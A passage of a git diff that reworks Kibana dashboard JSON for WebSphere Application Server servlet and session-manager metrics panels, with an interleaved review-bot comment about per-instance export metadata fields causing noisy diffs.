"websphere_application_server.servlet.errors : * " + }, + "visualization": { + "accessor": "17f33a89-5e4f-4b62-a12e-ea9870e908ac", + "layerId": "39707dfa-c5ec-473f-8d7f-43c96a9beaef", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "Number of Errors [Metrics WebSphere Application Server]", + "visualizationType": "lnsMetric", + "references": [ + { + "id": "metrics-*", + "name": 
"indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-39707dfa-c5ec-473f-8d7f-43c96a9beaef", + "type": "index-pattern" + } + ] + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "gridData": { + "h": 13, + "i": "310de529-9ca0-46bd-b1cc-223c1a51cb38", + "w": 11, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {} + "panelIndex": "310de529-9ca0-46bd-b1cc-223c1a51cb38", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "6bff5182-8367-4e11-8b9a-69bfe903149c": { + "columnOrder": [ + "e5379b96-4137-4122-ae12-4043ff5f1d83", + "1b761837-dde2-418e-b754-b51432eaf95a", + "146c0baa-3fa2-4ae9-aa73-a4d7669d55c1", + "302ef164-d49c-4a57-9a96-888917e2c880", + "302ef164-d49c-4a57-9a96-888917e2c880X0" + ], + "columns": { + "146c0baa-3fa2-4ae9-aa73-a4d7669d55c1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.servlet.requests.processed: *" + }, + "isBucketed": false, + "label": "Requests Processed", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.servlet.requests.processed" + }, + "1b761837-dde2-418e-b754-b51432eaf95a": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of App name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "146c0baa-3fa2-4ae9-aa73-a4d7669d55c1", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.servlet.app_name" + }, + 
"302ef164-d49c-4a57-9a96-888917e2c880": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Responses Processed", + "operationType": "formula", + "params": { + "formula": "last_value(websphere_application_server.servlet.responses.processed)", + "isFormulaBroken": false + }, + "references": [ + "302ef164-d49c-4a57-9a96-888917e2c880X0" + ], + "scale": "ratio" + }, + "302ef164-d49c-4a57-9a96-888917e2c880X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.servlet.responses.processed: *" + }, + "isBucketed": false, + "label": "Part of Responses Processed", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.servlet.responses.processed" + }, + "e5379b96-4137-4122-ae12-4043ff5f1d83": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "websphere_application_server.servlet.requests.processed > 0 or websphere_application_server.servlet.responses.processed > 0" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 13, - "i": "310de529-9ca0-46bd-b1cc-223c1a51cb38", - "w": 11, - "x": 0, - "y": 0 + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "310de529-9ca0-46bd-b1cc-223c1a51cb38", - "panelRefName": "panel_310de529-9ca0-46bd-b1cc-223c1a51cb38", - "type": "lens", - "version": "8.1.0" - }, - { - "embeddableConfig": { - "enhancements": {} + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 13, 
- "i": "acdff898-96e0-4331-bd7c-47acfa3db816", - "w": 18, - "x": 11, - "y": 0 + "layers": [ + { + "accessors": [ + "146c0baa-3fa2-4ae9-aa73-a4d7669d55c1", + "302ef164-d49c-4a57-9a96-888917e2c880" + ], + "layerId": "6bff5182-8367-4e11-8b9a-69bfe903149c", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "1b761837-dde2-418e-b754-b51432eaf95a", + "xAccessor": "e5379b96-4137-4122-ae12-4043ff5f1d83" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" }, - "panelIndex": "acdff898-96e0-4331-bd7c-47acfa3db816", - "panelRefName": "panel_acdff898-96e0-4331-bd7c-47acfa3db816", - "type": "lens", - "version": "8.1.0" + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": false, + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + }, + "yTitle": "Count" + } }, - { - "embeddableConfig": { - "enhancements": {} + "title": "Number of Processed Requests and Responses [Metrics WebSphere Application Server]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-6bff5182-8367-4e11-8b9a-69bfe903149c", + "type": "index-pattern" + } + ] + } + }, + "gridData": { + "h": 13, + "i": "acdff898-96e0-4331-bd7c-47acfa3db816", + "w": 18, + "x": 11, + "y": 0 + }, + "panelIndex": "acdff898-96e0-4331-bd7c-47acfa3db816", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "96a84b63-1fad-48c6-b0de-179dcbfcd741": { + "columnOrder": [ + "2760f523-a7b0-4dd9-adff-5743a44190f4", + "72a036b6-01af-4812-9bcf-f43429e39eb7", + "990fce2d-1026-4d37-85ed-088d392b41f9", + "d2e271e9-cc11-46df-aae0-121042e38bfa" + ], + "columns": { + 
"2760f523-a7b0-4dd9-adff-5743a44190f4": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "72a036b6-01af-4812-9bcf-f43429e39eb7": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of websphere_application_server.servlet.app_name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "990fce2d-1026-4d37-85ed-088d392b41f9", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.servlet.app_name" + }, + "990fce2d-1026-4d37-85ed-088d392b41f9": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.servlet.loaded: *" + }, + "isBucketed": false, + "label": "Loaded Servlets", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.servlet.loaded" + }, + "d2e271e9-cc11-46df-aae0-121042e38bfa": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.servlet.reloaded: *" + }, + "isBucketed": false, + "label": "Reloaded Servlets", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.servlet.reloaded" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "websphere_application_server.servlet.loaded > 0 or websphere_application_server.servlet.reloaded > 0" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 13, - "i": 
"f9b8fb75-0cf4-4be3-8258-a51a7b349fd8", - "w": 19, - "x": 29, - "y": 0 + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "f9b8fb75-0cf4-4be3-8258-a51a7b349fd8", - "panelRefName": "panel_f9b8fb75-0cf4-4be3-8258-a51a7b349fd8", - "type": "lens", - "version": "8.1.0" - } - ], - "timeRestore": false, - "title": "[Metrics WebSphere Application Server] Servlet", - "version": 1 - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-b8da46b0-b595-11ec-888d-b1230de080fd", - "migrationVersion": { - "dashboard": "8.3.0" - }, - "references": [ - { - "id": "websphere_application_server-39c70fd0-b59e-11ec-888d-b1230de080fd", - "name": "310de529-9ca0-46bd-b1cc-223c1a51cb38:panel_310de529-9ca0-46bd-b1cc-223c1a51cb38", - "type": "lens" + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "990fce2d-1026-4d37-85ed-088d392b41f9", + "d2e271e9-cc11-46df-aae0-121042e38bfa" + ], + "layerId": "96a84b63-1fad-48c6-b0de-179dcbfcd741", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "72a036b6-01af-4812-9bcf-f43429e39eb7", + "xAccessor": "2760f523-a7b0-4dd9-adff-5743a44190f4" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + }, + "yTitle": "Count" + } + }, + "title": "Number of Loaded and Reloaded Servlets [Metrics WebSphere Application Server]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-96a84b63-1fad-48c6-b0de-179dcbfcd741", + "type": "index-pattern" + } + ] + } }, - { - "id": 
"websphere_application_server-8ce6ed80-b59d-11ec-888d-b1230de080fd", - "name": "acdff898-96e0-4331-bd7c-47acfa3db816:panel_acdff898-96e0-4331-bd7c-47acfa3db816", - "type": "lens" + "gridData": { + "h": 13, + "i": "f9b8fb75-0cf4-4be3-8258-a51a7b349fd8", + "w": 19, + "x": 29, + "y": 0 }, - { - "id": "websphere_application_server-e6d7d480-b59d-11ec-888d-b1230de080fd", - "name": "f9b8fb75-0cf4-4be3-8258-a51a7b349fd8:panel_f9b8fb75-0cf4-4be3-8258-a51a7b349fd8", - "type": "lens" - } + "panelIndex": "f9b8fb75-0cf4-4be3-8258-a51a7b349fd8", + "type": "lens", + "version": "8.3.0" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics WebSphere Application Server] Servlet", + "version": 1 + }, + "references": [ + { + "type": "index-pattern", + "name": "310de529-9ca0-46bd-b1cc-223c1a51cb38:indexpattern-datasource-current-indexpattern", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "310de529-9ca0-46bd-b1cc-223c1a51cb38:indexpattern-datasource-layer-39707dfa-c5ec-473f-8d7f-43c96a9beaef", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "acdff898-96e0-4331-bd7c-47acfa3db816:indexpattern-datasource-layer-6bff5182-8367-4e11-8b9a-69bfe903149c", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "f9b8fb75-0cf4-4be3-8258-a51a7b349fd8:indexpattern-datasource-layer-96a84b63-1fad-48c6-b0de-179dcbfcd741", + "id": "metrics-*" + } + ], + "migrationVersion": { + "dashboard": "8.3.0" + }, + "coreMigrationVersion": "8.3.0" } \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/dashboard/websphere_application_server-db548380-c06d-11ec-8552-f3dc1a6b95f9.json b/packages/websphere_application_server/kibana/dashboard/websphere_application_server-db548380-c06d-11ec-8552-f3dc1a6b95f9.json index ec1c94aad84..10fbe37e736 100644 --- a/packages/websphere_application_server/kibana/dashboard/websphere_application_server-db548380-c06d-11ec-8552-f3dc1a6b95f9.json 
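Review bot: The new side of this dashboard starts with `"namespaces": ["default"]`, `"updated_at": "2023-11-07T17:50:18.506Z"` and `"version": "WzQyMywxXQ=="`, three fields the old side did not carry and which look like per-instance export metadata (a cluster timestamp and an opaque optimistic-concurrency token) rather than package content. If the export tooling is expected to strip such fields, the checked-in file should reflect that; otherwise every re-export from a different Kibana will churn these lines and produce noisy diffs unrelated to the dashboards themselves. The same three fields appear at the top of the next file section (`websphere_application_server-db548380-c06d-11ec-8552-f3dc1a6b95f9.json`, with `"version": "WzQyNCwxXQ=="`), so the decision should be applied to both. I would either drop the three lines or add a short note in the package's README/contributing docs stating that they are intentionally kept.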
+++ b/packages/websphere_application_server/kibana/dashboard/websphere_application_server-db548380-c06d-11ec-8552-f3dc1a6b95f9.json 
@@ -1,133 +1,583 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "oneLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"fa304aea-2c1b-4393-aef2-06114a566f7c\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"title\":\"Appname\",\"fieldName\":\"websphere_application_server.session_manager.app_name\",\"id\":\"fa304aea-2c1b-4393-aef2-06114a566f7c\",\"enhancements\":{}}}}" + "id": "websphere_application_server-db548380-c06d-11ec-8552-f3dc1a6b95f9", + "type": "dashboard", + "namespaces": [ + "default" + ], + "updated_at": "2023-11-07T17:50:18.506Z", + "version": "WzQyNCwxXQ==", + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"fa304aea-2c1b-4393-aef2-06114a566f7c\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"title\":\"Appname\",\"fieldName\":\"websphere_application_server.session_manager.app_name\",\"id\":\"fa304aea-2c1b-4393-aef2-06114a566f7c\",\"enhancements\":{}}}}" + }, + "description": "Session Manager dashboard for WebSphere Application Server Metrics.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "0eac0fd6-b8fc-4080-a3e6-3915b79b0fed": { + "columnOrder": [ + "2be98fc5-9e15-4e81-8ba1-f4cbc6f2c06a" + ], + 
"columns": { + "2be98fc5-9e15-4e81-8ba1-f4cbc6f2c06a": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Invalidated sessions by Timeouts", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } + }, + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.session_manager.sessions.invalidated.by_timeouts" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "4a163dcc-72d4-4fa7-a5e0-32e5fc5284ec", + "key": "websphere_application_server.session_manager.sessions.invalidated.by_timeouts", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "websphere_application_server.session_manager.sessions.invalidated.by_timeouts" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "2be98fc5-9e15-4e81-8ba1-f4cbc6f2c06a", + "layerId": "0eac0fd6-b8fc-4080-a3e6-3915b79b0fed", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "Invalidated sessions by Timeouts [Metrics WebSphere Application Server]", + "visualizationType": "lnsMetric", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0eac0fd6-b8fc-4080-a3e6-3915b79b0fed", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "4a163dcc-72d4-4fa7-a5e0-32e5fc5284ec", + "type": "index-pattern" + } + ] + } + }, + "gridData": { + "h": 17, + "i": "19872277-f696-4e82-a0d0-3a84dbc246e6", + "w": 14, + "x": 0, + "y": 0 }, - "description": "Session Manager dashboard for WebSphere Application Server Metrics.", - "hits": 0, - "kibanaSavedObjectMeta": { 
- "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" + "panelIndex": "19872277-f696-4e82-a0d0-3a84dbc246e6", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c": { + "columnOrder": [ + "b0fcb1bb-3640-4710-bb39-4e7ac9985961" + ], + "columns": { + "b0fcb1bb-3640-4710-bb39-4e7ac9985961": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Active Sessions", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.session_manager.sessions.active" + } + }, + "incompleteColumns": {} + } + } } - } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "bb425378-17d3-46b5-aab3-d274bdd9f097", + "key": "websphere_application_server.session_manager.sessions.active", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "websphere_application_server.session_manager.sessions.active" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "b0fcb1bb-3640-4710-bb39-4e7ac9985961", + "layerId": "0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "Active sessions [Metrics WebSphere Application Server]", + "visualizationType": "lnsMetric", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"bb425378-17d3-46b5-aab3-d274bdd9f097", + "type": "index-pattern" + } + ] + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "gridData": { + "h": 8, + "i": "db58d5f2-b5da-43f9-9a53-3dfe2151b7ad", + "w": 9, + "x": 14, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 17, - "i": "19872277-f696-4e82-a0d0-3a84dbc246e6", - "w": 14, - "x": 0, - "y": 0 + "panelIndex": "db58d5f2-b5da-43f9-9a53-3dfe2151b7ad", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "79027b05-459f-4773-823b-238f4e0b907a": { + "columnOrder": [ + "407e0b68-66ae-43db-a9e3-86e632694e6b", + "53ba3e6e-9050-4ad0-a043-2bd5a3d792ee", + "a6370094-15b2-4777-ac22-fe0612a6d34f", + "1dc49faf-ed90-489c-94cc-b145a28cba19" + ], + "columns": { + "1dc49faf-ed90-489c-94cc-b145a28cba19": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Persistent Stores Data Read", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.session_manager.persistent_stores.data_read" + }, + "407e0b68-66ae-43db-a9e3-86e632694e6b": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "53ba3e6e-9050-4ad0-a043-2bd5a3d792ee": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of websphere_application_server.session_manager.app_name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": 
"1dc49faf-ed90-489c-94cc-b145a28cba19", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.session_manager.app_name" + }, + "a6370094-15b2-4777-ac22-fe0612a6d34f": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Persistent Stores Data Written", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } + }, + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.session_manager.persistent_stores.data_written" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "19872277-f696-4e82-a0d0-3a84dbc246e6", - "panelRefName": "panel_19872277-f696-4e82-a0d0-3a84dbc246e6", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 8, - "i": "db58d5f2-b5da-43f9-9a53-3dfe2151b7ad", - "w": 9, - "x": 14, - "y": 0 + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "panelIndex": "db58d5f2-b5da-43f9-9a53-3dfe2151b7ad", - "panelRefName": "panel_db58d5f2-b5da-43f9-9a53-3dfe2151b7ad", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false + "layers": [ + { + "accessors": [ + "a6370094-15b2-4777-ac22-fe0612a6d34f", + "1dc49faf-ed90-489c-94cc-b145a28cba19" + ], + "layerId": "79027b05-459f-4773-823b-238f4e0b907a", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, 
+ "splitAccessor": "53ba3e6e-9050-4ad0-a043-2bd5a3d792ee", + "xAccessor": "407e0b68-66ae-43db-a9e3-86e632694e6b", + "yConfig": [ + { + "color": "#087dea", + "forAccessor": "a6370094-15b2-4777-ac22-fe0612a6d34f" + }, + { + "color": "#60c06d", + "forAccessor": "1dc49faf-ed90-489c-94cc-b145a28cba19" + } + ] + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" }, - "gridData": { - "h": 17, - "i": "83e5353e-78da-4523-8a4a-d370afc2eefa", - "w": 25, - "x": 23, - "y": 0 + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "83e5353e-78da-4523-8a4a-d370afc2eefa", - "panelRefName": "panel_83e5353e-78da-4523-8a4a-d370afc2eefa", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" }, - "gridData": { - "h": 9, - "i": "396f488f-0d3c-44c2-bd13-312d9db09222", - "w": 9, - "x": 14, - "y": 8 + "yRightExtent": { + "mode": "full" }, - "panelIndex": "396f488f-0d3c-44c2-bd13-312d9db09222", - "panelRefName": "panel_396f488f-0d3c-44c2-bd13-312d9db09222", - "title": "Created sessions [Metrics WebSphere Application Server]", - "type": "lens", - "version": "8.3.0" - } - ], - "timeRestore": false, - "title": "[Metrics WebSphere Application Server] Session Manager", - "version": 1 - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-db548380-c06d-11ec-8552-f3dc1a6b95f9", - "migrationVersion": { - "dashboard": "8.3.0" - }, - "references": [ - { - "id": "websphere_application_server-f28f6670-c07a-11ec-8552-f3dc1a6b95f9", - "name": "19872277-f696-4e82-a0d0-3a84dbc246e6:panel_19872277-f696-4e82-a0d0-3a84dbc246e6", - "type": "lens" + "yTitle": "Count" + } + }, + "title": "Persistent Store Data Read and Written [Metrics WebSphere Application Server]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + 
"name": "indexpattern-datasource-layer-79027b05-459f-4773-823b-238f4e0b907a", + "type": "index-pattern" + } + ] + } }, - { - "id": "websphere_application_server-eab8b780-c07a-11ec-8552-f3dc1a6b95f9", - "name": "db58d5f2-b5da-43f9-9a53-3dfe2151b7ad:panel_db58d5f2-b5da-43f9-9a53-3dfe2151b7ad", - "type": "lens" + "gridData": { + "h": 17, + "i": "83e5353e-78da-4523-8a4a-d370afc2eefa", + "w": 25, + "x": 23, + "y": 0 }, - { - "id": "websphere_application_server-0828ba40-c07b-11ec-8552-f3dc1a6b95f9", - "name": "83e5353e-78da-4523-8a4a-d370afc2eefa:panel_83e5353e-78da-4523-8a4a-d370afc2eefa", - "type": "lens" + "panelIndex": "83e5353e-78da-4523-8a4a-d370afc2eefa", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c": { + "columnOrder": [ + "b0fcb1bb-3640-4710-bb39-4e7ac9985961" + ], + "columns": { + "b0fcb1bb-3640-4710-bb39-4e7ac9985961": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Created Sessions", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.session_manager.sessions.created" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "10b45b12-77b4-4241-a864-55c5b313cd40", + "key": "websphere_application_server.session_manager.sessions.created", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "websphere_application_server.session_manager.sessions.created" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "b0fcb1bb-3640-4710-bb39-4e7ac9985961", + "layerId": 
"0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c", + "layerType": "data", + "size": "xl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "Created sessions [Metrics WebSphere Application Server]", + "visualizationType": "lnsMetric", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "10b45b12-77b4-4241-a864-55c5b313cd40", + "type": "index-pattern" + } + ] + } }, - { - "id": "websphere_application_server-ee7e7210-c07a-11ec-8552-f3dc1a6b95f9", - "name": "396f488f-0d3c-44c2-bd13-312d9db09222:panel_396f488f-0d3c-44c2-bd13-312d9db09222", - "type": "lens" + "gridData": { + "h": 9, + "i": "396f488f-0d3c-44c2-bd13-312d9db09222", + "w": 9, + "x": 14, + "y": 8 }, - { - "id": "metrics-*", - "name": "controlGroup_fa304aea-2c1b-4393-aef2-06114a566f7c:optionsListDataView", - "type": "index-pattern" - } + "panelIndex": "396f488f-0d3c-44c2-bd13-312d9db09222", + "title": "Created sessions [Metrics WebSphere Application Server]", + "type": "lens", + "version": "8.3.0" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics WebSphere Application Server] Session Manager", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "controlGroup_fa304aea-2c1b-4393-aef2-06114a566f7c:optionsListDataView", + "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "19872277-f696-4e82-a0d0-3a84dbc246e6:indexpattern-datasource-current-indexpattern", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "19872277-f696-4e82-a0d0-3a84dbc246e6:indexpattern-datasource-layer-0eac0fd6-b8fc-4080-a3e6-3915b79b0fed", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "19872277-f696-4e82-a0d0-3a84dbc246e6:4a163dcc-72d4-4fa7-a5e0-32e5fc5284ec", + "id": "metrics-*" + }, + 
